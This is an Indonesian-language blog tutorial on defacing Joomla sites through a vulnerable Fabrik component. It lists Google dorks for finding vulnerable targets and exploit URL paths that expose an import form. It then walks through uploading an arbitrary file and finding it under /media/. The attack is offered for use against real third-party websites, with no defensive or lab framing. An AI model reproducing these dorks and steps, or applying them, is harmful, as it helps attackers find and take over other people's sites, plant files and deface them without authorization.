Deface teknik Com_Fabrik ini adalah memanfaatkan bug pada celah website berbasis cms jomlaa yang memiliki vulnerabilitas pada componen fabrik di cms jomla. Oke gan simak tutorialnya.
Pertama siapkan bahan :
Dork :
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
Exploit :
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
1. Dorking
Step pertama kita adalah dorking. Dorkingnya harus sabar ya karena agak susah nemu websitenya yang vuln
2. Exploit site !
Kalau sudah dorking, dan memilih websitenya sekarang agan exploit, jika vuln terdapat kolom untuk uploadnya.
3. Upload
Untuk menguploadnya agan cuma perlu klik browse... kalau sudah pilih filenya klik Import CSV kalau sudah diupload kita cek file kita tadi, tempatnya ada di site.com/media/file.php
EmoticonEmoticon